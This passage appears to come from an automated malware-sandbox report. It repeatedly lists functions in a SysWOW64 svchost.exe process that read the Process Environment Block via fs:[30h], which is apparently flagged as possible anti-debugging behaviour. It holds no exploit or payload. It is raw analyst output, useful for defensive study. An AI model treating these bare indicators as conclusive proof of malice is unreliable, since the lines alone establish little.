                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]1_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]1_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
